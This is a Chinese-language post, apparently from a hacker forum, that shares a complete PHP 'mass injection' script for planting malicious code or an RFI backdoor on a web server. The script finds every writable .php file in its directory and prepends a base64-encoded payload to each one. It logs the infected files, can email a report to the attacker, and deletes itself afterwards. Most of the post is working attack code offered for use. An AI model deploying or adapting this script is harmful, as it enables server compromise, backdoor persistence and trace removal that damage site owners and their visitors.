php挂马攻击,PHP批量挂马脚本

来源：红狼

作者：f3v3r

批量写入档案脚本…

可以拿来挂马

也能拿来当RFI的后门注入

code都写明的，有需要的请自己看

后门写在$inj里面，要做base64 encode的Polymorphic

不希望这个东西被搞破坏的人拿去玩

懂原理的就自个儿收下吧

set_time_limit(0);

ignore_user_abort(1);

# PHP Mass Injection Script by f3v3r ver.228

# |1| Look for PHP in directory.|2| Check injected.

# |3| Inject script. |4|Can email report to you.

$inj ='';

$log_email = 0;//change 1 enable, somehow they can trace you by this way.

$email = '[email protected]';

$log_report = 1;

$filename = '__log.html';

$delete_me = 1;

echo '

f3v3r injection toolz Defacez aint hack, r00tz r.
';

$dir = opendir('.');

$site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);

while ($file = readdir($dir))

{

if (strstr($file, '.php') && is_writeable($file))

{

$victim = fopen($file, 'r+');

$victim_read = fread($victim, filesize($file));

if (!strstr($victim_read, 'f3v3r'))

{

fclose($victim);

unlink($file);

$new = fopen($file, 'a+');

$new_write = fwrite($new, base64_decode($inj) . $victim_read);

fclose($new);

echo '[-] injecting : ' . $site . '
';

echo '[x] injected: ' . $file . '
';

if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() . $file . '
'); fclose($log); }

if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() . $file . '\n'); fclose($x); }

}

}

}

closedir($dir);

if($log_email) { $report = file_get_contents('__tmp'); mail($email, "injection report", '
f3v3r
' .$report, 'From: f3v3r '); unlink('__tmp'); echo '[x] Email Report Sent!';}

if($delete_me) { unlink(__file__); }

exit;

?>

MD5 checksum:DE734BDAC73E6ECE8DD3DB40416976E8

#f3v3r